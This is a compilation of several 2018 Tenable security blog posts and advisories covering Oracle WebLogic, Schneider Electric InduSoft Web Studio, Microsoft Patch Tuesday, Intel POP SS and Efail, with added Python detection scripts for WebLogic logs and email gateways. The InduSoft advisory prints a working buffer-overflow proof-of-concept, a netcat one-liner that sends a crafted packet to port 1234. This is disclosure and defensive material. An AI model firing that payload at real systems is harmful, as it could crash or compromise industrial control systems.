Similarly, there have been tweets about using the ysoserial payload Jdk7u21, which relies on a deserialization gadget chain in the Java runtime environment itself. However, that was patched in Java 7 in 2013 and in Java 8 in 2014. If you’re running Java versions that old then, yeah, you’ve got problems and this exploit may be an issue.
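The stack trace above is a useful detection signal in its own right: a server whose gadget classes have been removed rejects the payload at the class-descriptor stage and logs BEA-080003 with a ClassCastException raised from MsgAbbrevInputStream.readClassDescriptor. The following script is an added example, not Tenable or Oracle code, that parses WebLogic server-log entries and flags that signature. The sample log is constructed from the excerpt above plus one benign entry, and the parser assumes the standard `<timestamp> <severity> <subsystem> <BEA-id> <message>` header layout with stack-trace frames on the continuation lines.

```python
"""Flag WebLogic log entries that match the failed-gadget signature quoted above.
Added detection example, not Tenable or Oracle code."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Header of one WebLogic server-log entry; the message may continue on later lines.
HEADER_RE = re.compile(
    r"^<(?P<ts>[^>]+)> <(?P<sev>[^>]+)> <(?P<sub>[^>]+)> <(?P<id>BEA-\d+)> <(?P<msg>.*)$"
)
# A Java stack frame: "at pkg.Class.method(File.java:123)"
FRAME_RE = re.compile(r"^\s*at (?P<frame>[\w.$]+)\(")

# Signature taken from the log excerpt in the post.
DESER_CAST_ERROR = "cannot be cast to weblogic.rjvm.ClassTableEntry"
READ_CLASS_DESC = "weblogic.rjvm.MsgAbbrevInputStream.readClassDescriptor"

# Constructed sample: one benign lifecycle entry plus the entry from the post.
SAMPLE_LOG = """\
<Apr 30, 2018 8:23:40,101 AM PDT> <Notice> <WebLogicServer> <BEA-000365> <Server state changed to RUNNING.>
<Apr 30, 2018 8:23:49,869 AM PDT> <Warning> <RMI> <BEA-080003> <A RuntimeException was generated by the RMI server: weblogic.common.internal.RMIBootServiceImpl.authenticate(Lweblogic.security.acl.UserInfo;)
java.lang.ClassCastException: com.sun.proxy.$Proxy160 cannot be cast to weblogic.rjvm.ClassTableEntry.
java.lang.ClassCastException: com.sun.proxy.$Proxy160 cannot be cast to weblogic.rjvm.ClassTableEntry
at weblogic.rjvm.MsgAbbrevInputStream.readClassDescriptor(MsgAbbrevInputStream.java:423)
at weblogic.utils.io.ChunkedObjectInputStream$NestedObjectInputStream.readClassDescriptor(ChunkedObjectInputStream.java:288)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1855)
Truncated. see log file for complete stacktrace
>
"""


@dataclass
class LogEntry:
    timestamp: str
    severity: str
    subsystem: str
    message_id: str
    message: str
    frames: List[str] = field(default_factory=list)


def parse_weblogic_log(text: str) -> List[LogEntry]:
    """Groups header lines with their continuation text and stack frames."""
    entries: List[LogEntry] = []
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line == ">":          # blank line or closing bracket of a message
            continue
        header = HEADER_RE.match(line)
        if header:
            entries.append(LogEntry(header["ts"], header["sev"], header["sub"],
                                    header["id"], header["msg"].rstrip(">")))
            continue
        if not entries:                      # continuation text before any header
            continue
        frame = FRAME_RE.match(line)
        if frame:
            entries[-1].frames.append(frame["frame"])
        else:
            entries[-1].message += "\n" + line
    return entries


def is_t3_deserialization_probe(entry: LogEntry) -> bool:
    """True when the entry matches the rejected-gadget signature from the post."""
    return (
        entry.subsystem == "RMI"
        and entry.message_id == "BEA-080003"
        and "java.lang.ClassCastException" in entry.message
        and DESER_CAST_ERROR in entry.message
        and READ_CLASS_DESC in entry.frames
    )


def triage_log(text: str) -> List[Dict[str, str]]:
    """Returns one finding per matching entry; empty list when nothing matches."""
    return [
        {"timestamp": e.timestamp, "message_id": e.message_id,
         "reason": "ClassCastException while reading a class descriptor from a T3 stream"}
        for e in parse_weblogic_log(text) if is_t3_deserialization_probe(e)
    ]


if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LOG):
        print(finding)
```

A hit means an attempt that failed at the gadget stage, not a compromise: a deserialization that succeeds produces no such exception, so this rule complements, rather than replaces, monitoring of TCP port 7001 and the Nessus checks listed under “Identifying affected systems” below.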

Prevalence

We haven’t seen reports of servers being attacked using the vulnerabilities identified in CVE-2018-2628 yet. But the attention this vulnerability is getting increases the chances that we’ll see attacks soon. This is an easily exploitable vulnerability that requires no authentication. Successful attacks can result in takeover of Oracle WLS. Exposure could be high for organizations running one of the affected versions. It should be noted that Oracle WebLogic servers have been a target in the past: a vulnerability identified by CVE-2017-10271 was previously used by threat actors to deliver cryptocurrency miners.

Urgently required actions

Oracle has issued a fix as part of the April 2018 Critical Patch Update that was supposed to address this concern. Unfortunately, it fails to do so. While the patch update misses the mark, organizations should still apply the update, as many other security concerns are addressed.

In the meantime, vulnerable systems should be identified and the risk should be managed according to your organization's security policies. Tenable offers several methods to assist organizations in detecting this vulnerability.

Identifying affected systems

These Nessus® plugins detect whether the version of Oracle WLS installed on the remote host is affected:

  • Plugin ID 109201: Oracle WebLogic Server Multiple Vulnerabilities (April 2018 CPU)
  • Plugin ID 109429: Oracle WebLogic Server Deserialization RCE (CVE-2018-2628)

The following Nessus plugins cover all T3 deserialization attacks:

  • Plugin ID 87011: Oracle WebLogic Java Object Deserialization RCE
  • Plugin ID 90709: Oracle WebLogic Server Java Object Deserialization RCE (April 2016 CPU)
  • Plugin ID 92606: Oracle WebLogic Server Java Object Deserialization RCE (July 2016 CPU)
  • Plugin ID 94511: Oracle WebLogic Server Java Object Deserialization RCE (October 2016 CPU)
  • Plugin ID 96803: Oracle WebLogic Java Object RMI Connect-Back Deserialization RCE (January 2017 CPU)

Tenable.io® Container Security also detects the issue, and will detect affected versions of WebLogic automatically.

Get more information

Special thanks to Jacob Baines for contributing to this blog post.

Tenable Research Advisory: Critical Schneider Electric InduSoft Web Studio and InTouch Machine Edition Vulnerability


Tenable Research recently discovered a new remote code execution vulnerability in Schneider Electric’s InduSoft Web Studio and InTouch Machine Edition. The applications contain an overflow condition that is triggered when input is not properly validated. This allows an attacker to force a stack-based buffer overflow, resulting in denial of service or potentially allowing the execution of arbitrary code.

   

  • What do you need to know? Tenable Research has discovered a critical remote code execution vulnerability in Schneider Electric’s InduSoft Web Studio and InTouch Machine Edition.
  • What's the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.
  • What's the business impact? A malicious threat actor can completely compromise and gain control of the system, and use it as a pivot point to move laterally.
  • What's the solution? Schneider Electric has released InduSoft Web Studio v8.1 SP1 and InTouch Machine Edition 2017 v8.1 SP1 to address this vulnerability. Affected users should apply the patches ASAP.

Background

InduSoft Web Studio is a suite of tools that provides automation building blocks to develop human-machine interfaces (HMIs), Supervisory Control And Data Acquisition (SCADA) systems and embedded instrumentation solutions.

InTouch Machine Edition is an HMI/SCADA software toolset to develop applications to connect automation systems such as Programmable Logic Controllers (PLCs) and to develop interfaces for web browsers, smartphones and tablets.

SCADA systems, comprising industrial-grade hardware and software, are a standard component of Industrial Control Systems (ICSs). They have traditionally been deployed around the world to monitor industrial infrastructure to collect, analyze and control information from sensors. With the growing adoption of distributed and remote monitoring in industrial environments, SCADA and operational technology (OT) are converging to provide true “beyond the perimeter” connectivity.

Diverse industries including agriculture, transportation, energy, nuclear power, manufacturing, entertainment and physical security use SCADA in conjunction with OT. Because of the critical and wide range of applications in modern infrastructure, SCADA systems have become a primary security concern and are increasingly being targeted by threat actors.

Analysis

Tenable Research found a new stack-based buffer overflow in InduSoft Web Studio and InTouch Machine Edition. A threat actor could send a crafted packet to exploit the buffer overflow vulnerability using a tag, alarm, event, read or write action to execute code.

Figure: IWS StackOverflow

The vulnerability can be remotely exploited without authentication and targets the IWS Runtime Data Server service, by default on TCP port 1234. The software implements a custom protocol that uses various “commands.” This vulnerability is triggered through command 50, and is caused by the incorrect usage of a string conversion function.

The vulnerability, when exploited, could allow an unauthenticated malicious entity to remotely execute code with high privileges.

The following is a proof of concept:

cat <(echo -ne '\x02\x57\x03\x02\x32'`python -c 'print "A"*0x500'`'\x09\x0a\x03') - | nc <target_host> 1234

Figure: IWS Crash

Business impact

An unauthenticated remote attacker can leverage this attack to execute arbitrary code on vulnerable systems, potentially leading to full compromise of the InduSoft Web Studio or InTouch Machine Edition server machine. A threat actor can use the compromised machine to move laterally within the victim’s network and to execute further attacks. Additionally, connected HMI clients and OT devices can be exposed to attack.

Given the widespread prevalence and market share of the affected software in the OT space, and the fact that it is frequently deployed in sensitive industries, Schneider and Tenable consider this a critical vulnerability requiring urgent attention and response from affected end users.

Vulnerability characterization and CVSSv3 rating

CWE-121: Stack-based Buffer Overflow

InduSoft Web Studio and ITME: 9.8 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Solution

Schneider Electric has released InduSoft Web Studio v8.1 SP1 and InTouch Machine Edition 2017 v8.1 SP1 to address this vulnerability. Update the application by applying the appropriate patches.

Identifying affected systems

Tenable released the following plugins to identify systems affected by the Schneider Electric InduSoft Web Studio and InTouch Machine Edition vulnerability:

Additional information

Special thanks to Steve Tilson, Josef Weiss and Jacob Baines for their contributions to this blog post.


Microsoft May Madness


Patch Tuesday was anything but typical in the month of May. On May 8, Microsoft released security patches for a total of 67 vulnerabilities, addressing 21 critical vulnerabilities, 42 important and four low-severity, while Adobe addressed a critical flaw in Adobe Flash Player. This is a big push from Microsoft in securing Windows, coming right after the recent release of Windows 10, version 1803, which added several security improvements, among other feature updates.

However, what makes this update particularly important is that it addresses two zero-day vulnerabilities that are being actively exploited in the wild and a further two for which public exploits have been published.

The first critical vulnerability is the Internet Explorer (IE) Double Kill vulnerability (CVE-2018-8174), which Tenable reported on in April 2018. The second zero-day is CVE-2018-8120, a privilege escalation vulnerability within the Win32k component. Microsoft also patched CVE-2018-8141 (Windows kernel information disclosure vulnerability) and CVE-2018-8170 (Windows image elevation of privilege vulnerability). Technical details, including exploits, for both of these CVEs are public, but attackers don't seem to be taking advantage of them at the time of writing.

A patch for a critical Adobe Flash Player vulnerability (CVE-2018-4944) was also released as part of Adobe’s Patch Tuesday update.

Impact assessment

For anyone running Windows 10, all but one of the CVEs pose a considerable risk and represent an urgent security concern. These can lead to full system compromise if left unmitigated.

One zero-day, IE Double Kill, affects the current version of IE and other applications that use the browser. The other zero-day is the Win32k privilege escalation vulnerability that impacts Windows 7 and Server 2008 users. Both zero-day vulnerabilities permit privilege escalation and full system compromise if exploited.

Vulnerability details

Microsoft’s May security release includes security updates for the following applications:

  • Internet Explorer
  • Microsoft Edge
  • Microsoft Windows
  • Microsoft Office and Microsoft Office Services and Web Apps
  • ChakraCore
  • Adobe Flash Player
  • .NET Framework
  • Microsoft Exchange Server
  • Windows Host Compute Service Shim

The most critical fixes in this security update are for Internet Explorer and Microsoft Windows. Also contained within the update are several patches for Office, Outlook and SharePoint rated Important. Exchange and the .NET Framework also have a couple of patches rated Important.

CVE-2018-8174, aka “IE Double Kill”, is being actively exploited in the wild. Additional details on this vulnerability can be found here. This is an extremely dangerous vulnerability, as it not only targets the browser but also affects ActiveX controls and embedded scripts in Office documents. Until a patch has been applied, attackers can potentially force Internet Explorer to load, even if IE is not the default browser.

CVE-2018-8120, a privilege escalation vulnerability within the Win32k component, is also being actively exploited in the wild and is rated as “Important.” It only affects Windows 7, Windows Server 2008 and Windows Server 2008 R2.

Urgently required actions

Due to public exploit availability and the active exploitation of these vulnerabilities, we recommend that users urgently install the security updates to protect themselves.

Tenable has the following Nessus plugins to detect CVE-2018-8174, CVE-2018-8120, CVE-2018-8141 and CVE-2018-8170:

  • Plugin ID 109604: KB4103712: Windows 7 and Windows Server 2008 R2 May 2018 Security Update
  • Plugin ID 109610: KB4103726: Windows Server 2012 May 2018 Security Update
  • Plugin ID 109607: KB4103715: Windows 8.1 and Windows Server 2012 R2 May 2018 Security Update
  • Plugin ID 109606: KB4103723: Windows 10 Version 1607 and Windows Server 2016 May 2018 Security Update
  • Plugin ID 109608: KB4103727: Windows 10 Version 1709 May 2018 Security Update
  • Plugin ID 109611: KB4103716: Windows 10 May 2018 Security Update
  • Plugin ID 109605: KB4103721: Windows 10 Version 1803 May 2018 Security Update
  • Plugin ID 109603: KB4103731: Windows 10 Version 1703 May 2018 Security Update

Get more information:

Advance Your Security Program with the Latest SecurityCenter Innovations


Since its introduction in 2003, SecurityCenter® has continually driven innovation in the vulnerability management market, enabling organizations to manage and measure Cyber Exposure across IT assets. With the recent spate of high-profile breaches and threats – Equifax, WannaCry, Petya/NotPetya and others – there’s never been a greater need for effective cyber hygiene. And that starts with vulnerability management.

We’ve been hard at work enhancing SecurityCenter to help you take the next step forward in maturing your security program. Our latest innovations are focused on enterprise manageability, performance and analytical improvements, and technology integrations. We’re excited to take the wraps off some recent feature and integration releases and give you a glimpse into what's coming soon. Let’s take a look!

Enterprise manageability

We’ve enhanced enterprise-level manageability to accommodate localized security policy requirements and enriched asset detection for diverse IT environments, with the following:

  • Multi-LDAP support: Many large organizations use more than one LDAP server, which creates challenges for those using LDAP to authorize SecurityCenter users. By adding support for using multiple LDAP servers to authorize SecurityCenter users, we’re helping customers reduce operational overhead and administrative challenges and support compliance with local security policies.
  • Expanded asset discovery and fingerprinting for IT environments: We’ve recently enhanced detections for dozens of new asset attributes to increase both the breadth and depth of asset discovery. We added printer detection via TLS/SSL, MAC Address discovery via SNMP and VXLAN, Hostname via DNS and mDNS and many more. Our patented passive network monitoring technology (Nessus® Network Monitor) sees and identifies devices that would otherwise go undetected by other VM solutions.

Performance and analytical improvements

To help security teams be as effective and efficient as possible, we’re continuing to invest in SecurityCenter in the areas of performance and analytical capabilities, and we’re pleased to announce key enhancements:

  • Performance improvements with multi-threading: By updating SecurityCenter to take advantage of multi-threading, we’re delivering performance and speed increases that enable up to a 50-percent reduction in the time required for dynamic asset preparation for larger data sets, increased speed for Recast/Accept and faster searching with plugin text searches and for complex searches on Plugin Output.
  • Plugin filtering: This advanced scanning capability gives customers the ability to filter by plugin family type, such as Backdoors or Brute Force Attacks. It helps you save time and increase productivity by providing a comprehensive view of plugins associated with a specific family type.
  • CVSSv3 (coming in Q3): To ensure the most accurate vulnerability scores, SecurityCenter will soon pull vulnerability scores from CVSS version 3, the latest version of CVSS. CVSS is the industry-standard vulnerability scoring system and SecurityCenter’s main scoring system for vulnerabilities. CVSS version 3 aims to provide clearer, more consistent and more accurate scores for modern-day vulnerabilities.

Technology integrations

Tenable is integrating SecurityCenter with even more market-leading technology solutions to solve a broad set of customer challenges and automate more processes. From ingesting third-party data to simplifying credential management, SecurityCenter’s integrations make it easier for organizations to manage their vulnerability management program and minimize risk:

  • ServiceNow: This new integration allows customers to seamlessly export SecurityCenter vulnerability data into ServiceNow Vulnerability Response, making it easier to gain continuous visibility from vulnerability detection and prioritization through remediation. With this, customers can move beyond manual exporting and importing by automating and speeding the resolution of security issues. With Tenable and ServiceNow, your security team can focus on security, not IT.
  • CyberArk: We’ve enhanced the integration between SecurityCenter and CyberArk to simplify the way customers manage access to privileged credentials for vulnerability and compliance scans. Users no longer need to store and manage their credentials within SecurityCenter to perform authenticated scans, easing administration and reducing the complexity of credential management.
  • BMC: This new integration allows customers to automatically export Tenable vulnerability and compliance violation findings into the BMC SecOps Response Service to accelerate incident response.
  • BeyondTrust (coming in Q3): Tenable will automatically obtain privileged credentials from BeyondTrust PowerBroker to perform authenticated scans. This integration simplifies management of user access and privileges while scanning for vulnerabilities and compliance checks with SecurityCenter. Users get full administrator-level access to the system they’re scanning.
  • Lieberman (coming in Q3): This integration gives joint customers the ability to configure SecurityCenter to pull credentials from Lieberman RED for authenticated scanning. Users will be able to more easily run credentialed scans to yield deeper, more accurate scan results to get better visibility into vulnerabilities on their network.
  • Expanded SIEM integrations: To ensure customers can seamlessly import vulnerability data into their central correlation platforms, we’re expanding our integrations with SIEM providers. We’ve recently completed integrations with LogRhythm and IBM QRadar. And coming soon, you’ll see support for McAfee ESM (coming in Q3) as well as an updated Splunk application (coming in Q2) that enhances the user experience and ensures easy transfer of data.

We’re excited to share these innovations in SecurityCenter and how we’re continuing to enhance the platform to meet customers’ vulnerability management needs.

To learn more about how organizations are using SecurityCenter to gain better visibility and understanding of their IT environments, check out this great talk by Jered Bare from CARFAX on building custom tools with the SecurityCenter API, given at our recent user conference, Edge 2018.

We continue driving SecurityCenter forward to support demanding enterprise requirements, providing security teams with automated, continuous and accurate visibility into their IT assets.

Want to learn more? Join our customer community or contact us to learn more about SecurityCenter and our recent and upcoming innovations.

Tenable Research: April Vulnerability Disclosure Roundup


Tenable Research has a dedicated team that performs vulnerability research on software and hardware from third-party vendors. The goal is to discover zero-day vulnerabilities and work with vendors to get them addressed before hackers discover and exploit them. This post provides an overview of all the vulnerabilities discovered by Tenable Research in April.

You can access all Tenable Research advisories here.

Schneider Electric InduSoft Web Studio and InTouch Machine Edition Critical Remote Code Execution Vulnerability

CVE ID: CVE-2018-8840

Nessus Plugin ID: 109280

Tenable Research Advisory: TRA-2018-07

Risk Factor: Critical

What do you need to know?

Tenable Research recently discovered a new remote code execution vulnerability in Schneider Electric’s InduSoft Web Studio and InTouch Machine Edition. The applications contain an overflow condition that is triggered when input is not properly validated. This allows an attacker to force a stack-based buffer overflow, resulting in denial of service or potentially allowing the execution of arbitrary code. Read our full analysis here. Read TechRepublic’s coverage.

What’s the attack vector?

The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.

What’s the business impact?

A malicious threat actor can completely compromise and gain control of the system and use it as a pivot point to move laterally through a network.

What’s the solution?

Schneider Electric has released InduSoft Web Studio v8.1 SP1 and InTouch Machine Edition 2017 v8.1 SP1 to address this vulnerability. Affected users should apply the patches ASAP.

Belkin N750 F9K1103 v1 Multiple Vulnerabilities

CVE IDs: CVE-2018-1143, CVE-2018-1144, CVE-2018-1145, CVE-2018-1146

Nessus Plugin ID: 109059

Tenable Research Advisory: TRA-2018-08

Risk Factor: Critical

What do you need to know?

Tenable Research has discovered four vulnerabilities in Belkin’s N750 F9K1103 v1 wireless router.

What’s the attack vector?

All four vulnerabilities can be exploited remotely without authentication.

What’s the business impact?

The most serious vulnerability permits an unauthenticated remote attacker to enable the unauthenticated telnet service, resulting in full compromise with administrator privileges of the router.

What’s the solution?

There is currently no known solution. The vendor has not released a fixed firmware.

ADVISORY: Intel...Simply Misunderstood?


To close numerous security gaps, Microsoft, Adobe, Apple, Red Hat, Xen, VMware and other vendors have released a number of patches in the first 10 days of May. We discussed some of these in our recent blog post, Microsoft May Madness. However, one issue that stands out because it impacts multiple operating system platforms is the chip giant Intel’s CVE-2018-8897. A problem that’s being framed as a “developers documentation misunderstanding” has turned into a cross-platform patch requirement to secure the kernel. To be clear, the issue doesn’t exist in the chip itself – rather, in the way developers have built their software stacks to interact with the processor.

Modern processors provide a hardware debugging infrastructure that allows system designers and developers to debug their system and monitor events. When such events occur during the course of program execution, a debug exception is raised. Developers at various vendors misunderstood Intel’s documentation about the way processors handle that exception. This has led to a flaw being present on multiple platforms that could allow unauthenticated users to read sensitive data in memory or control low-level operating system functions by gaining elevated privileges. The flaw was reported by researchers Nick Peterson of Everdox Tech and Nemanja Mulasmajic of triplefault.io in their detailed white paper POP SS/MOV SS Vulnerability.

Analysis

The vulnerability itself is not remotely exploitable and an attacker would need to have access to the system. At the time of publication, there’s no indication that attackers have exploited the issue on any operating system. Also, no proof of concept exploit code has been publicly released. However, it should be noted that some researchers have stated that they can exploit Windows systems and should be able to exploit Linux as well. Hence, our recommendation is to mitigate as soon as possible.

Solution

Refer to vendor-specific documentation for patching.

Intel has released the following statement, according to Digitpol: “The security of our customers and partners is important to us. To help ensure clear communication with the developer community, we are updating our Software Developers Manual (SDM) with clarifying language on the secure use of the POP/MOV-SS instructions. We recommend that system software vendors evaluate their software to confirm their products handle the situations in question.”

Tenable has released multiple plugins to help our customers determine their Cyber Exposure gap.

Additional information

ADVISORY: Efail...PGP Has an Email Problem?


Email continues to be one of the most popular ways to communicate in the world today. And given the rapidly evolving threat landscape, email encryption has never been more critical. Pretty Good Privacy (PGP) has long been a trusted platform for encrypted messaging and remains a popular method of sending secure, private email.

On May 14, a research team led by Sebastian Schinzel, researcher and professor of computer security at Münster University of Applied Sciences, disclosed critical vulnerabilities in implementations of several email clients and the OpenPGP and S/MIME standards that could be exploited to disclose sensitive information by exfiltrating plaintext of encrypted messages. It’s also possible that old messages which were previously encrypted could be disclosed.

The research team is using the name Efail to describe these vulnerabilities. They released a technical report with details. Essentially, Efail attacks exploit weaknesses in the various email clients, PGP and S/MIME, by tricking email clients into revealing the plaintext of the encrypted emails to the attacker. In the technical paper, researchers state that for the attack against the email clients that involves direct exfiltration, “EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim's email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.”

The second issue, named the CBC/CFB Gadget attack, abuses vulnerabilities in the specification of OpenPGP and S/MIME, thereby allowing the attacker to exfiltrate the plaintext from encrypted messages.

After reviewing the research, the Electronic Frontier Foundation (EFF) also stated it could “confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.”

There’s an ongoing debate in the cybersecurity community whether these issues are in the specifications or the email clients. Some cybersecurity professionals have expressed concerns that the issue also affects the core protocol of PGP, including file encryption. GNU Privacy Guard tweeted, “They figured out mail clients which don't properly check for decryption errors and also follow links in HTML mails. So the vulnerability is in the mail clients and not in the protocols. In fact OpenPGP is immune if used correctly while S/MIME has no deployed mitigation.”

Due to the risk and severity of the vulnerabilities, it’s likely the affected vendors will release patches to mitigate both these issues before a comprehensive evaluation of the PGP and S/MIME specifications is conducted.

Solution

There are currently no reliable fixes for these issues. There’s a large list of vendors affected (see section titled “Responsible Disclosure”).

Tenable Research is closely following the developing situation for these vulnerabilities:

  • CVE-2017-17688: OpenPGP CFB gadget attacks
  • CVE-2017-17689: S/MIME CBC gadget attacks

If OpenPGP is patched to detect and discard messages with modified ciphertext, Tenable’s container security would detect outdated versions. Similarly, when mail clients take steps to mitigate these issues, Container Security would detect those outdated versions as well.

We’re monitoring the situation and are actively working on releasing checks and plugins to help our customers determine if they’re vulnerable and assess their Cyber Exposure.

Some interim mitigations

  • Don’t decrypt email messages using vulnerable clients. Use a standalone application to decrypt email messages, so that direct exfiltration channels aren’t opened up as a result of these vulnerabilities. This trade-off involves the addition of an extra step when receiving encrypted messages.
  • Disable rendering of remote content in messages on email clients. This reduces the attack surface area and raises the bar for exploitation. However, this will also mean that active content in messages cannot be viewed.
  • Apply patches from vendors as soon as they are available.
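The second mitigation above amounts to a policy question a mail gateway can answer before any client renders the message: does the HTML fetch anything remote, and is encrypted content travelling alongside it? The following script is an added example, not part of this post or of any vendor product, that walks a MIME message, lists the http(s) URLs its HTML parts would load when rendered (img, link, iframe, object and similar attributes plus CSS url() references; cid: and data: references are local and ignored) and classifies the message accordingly. The sample message, the mail-track.example host and the addresses are constructed, and the PGP block is a placeholder rather than real ciphertext.

```python
"""Gateway-side check for the Efail direct-exfiltration shape: encrypted content
travelling with HTML that loads remote resources. Added example; the sample
message, hosts and addresses are constructed placeholders."""
import email
import re
from email import policy
from html.parser import HTMLParser
from typing import List, Set

# HTML attributes that make a client fetch a URL when the message is rendered.
LOADING_ATTRS = {
    "img": ("src",), "iframe": ("src",), "link": ("href",), "object": ("data",),
    "source": ("src",), "video": ("src", "poster"), "audio": ("src",),
    "body": ("background",), "table": ("background",),
}
CSS_URL_RE = re.compile(r"url\(\s*['\"]?\s*(https?://[^'\")\s]+)", re.I)
REMOTE_RE = re.compile(r"^\s*https?://", re.I)
ENCRYPTED_TYPES = {"multipart/encrypted", "application/pgp-encrypted", "application/pkcs7-mime"}

# Constructed sample: a tracking-pixel style HTML part next to an (inline) PGP block.
SAMPLE_MESSAGE = """\
From: sender@example.com
To: victim@example.net
Subject: quarterly numbers
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body style="background: url(https://mail-track.example/bg.png)">
<p>Please see the attached report.</p>
<img src="cid:logo@example.com" alt="logo">
<img src="https://mail-track.example/open?id=42" width="1" height="1">
<style>.x { background-image: url('https://mail-track.example/x.png'); }</style>
</body></html>
--b1
Content-Type: text/plain; charset="utf-8"

-----BEGIN PGP MESSAGE-----
(constructed placeholder, not a real PGP packet)
-----END PGP MESSAGE-----
--b1--
"""


class RemoteLoadFinder(HTMLParser):
    """Collects every http(s) URL the HTML would fetch on render; cid:/data: stay local."""

    def __init__(self) -> None:
        super().__init__()
        self.urls: Set[str] = set()
        self._in_style = False

    def handle_starttag(self, tag, attrs) -> None:
        attr = dict(attrs)
        if tag == "style":
            self._in_style = True
        for name in LOADING_ATTRS.get(tag, ()):
            value = attr.get(name)
            if value and REMOTE_RE.match(value):
                self.urls.add(value.strip())
        if attr.get("style"):                      # inline CSS such as background: url(...)
            self.urls.update(CSS_URL_RE.findall(attr["style"]))

    def handle_endtag(self, tag) -> None:
        if tag == "style":
            self._in_style = False

    def handle_data(self, data) -> None:
        if self._in_style:                         # url(...) inside a <style> block
            self.urls.update(CSS_URL_RE.findall(data))


def find_remote_loads(raw_message: str) -> List[str]:
    """Sorted list of remote URLs that rendering the message's HTML parts would fetch."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    finder = RemoteLoadFinder()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            finder.feed(part.get_content())
    return sorted(finder.urls)


def has_encrypted_content(raw_message: str) -> bool:
    """True for PGP/MIME or S/MIME structure, or an inline armored PGP block in a text part."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() in ENCRYPTED_TYPES:
            return True
        if part.get_content_maintype() == "text" and "-----BEGIN PGP MESSAGE-----" in part.get_content():
            return True
    return False


def classify(raw_message: str) -> str:
    """Policy decision: clean, strip-remote (deliver without remote loads) or hold (quarantine)."""
    if not find_remote_loads(raw_message):
        return "clean"
    if has_encrypted_content(raw_message):
        return "hold"            # encrypted payload plus remote loads: the Efail shape
    return "strip-remote"        # ordinary tracking content: neutralize the loads and deliver


if __name__ == "__main__":
    print(classify(SAMPLE_MESSAGE), find_remote_loads(SAMPLE_MESSAGE))
```

The hold decision mirrors the direct-exfiltration case the researchers describe: plaintext only leaks if the client decrypts and then loads a remote resource, so an encrypted part next to remote loads is the combination worth quarantining for review. The parser only recognizes the attributes listed, so treat it as a first filter in front of the client-side setting, not as a complete HTML sanitizer.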

Additional information
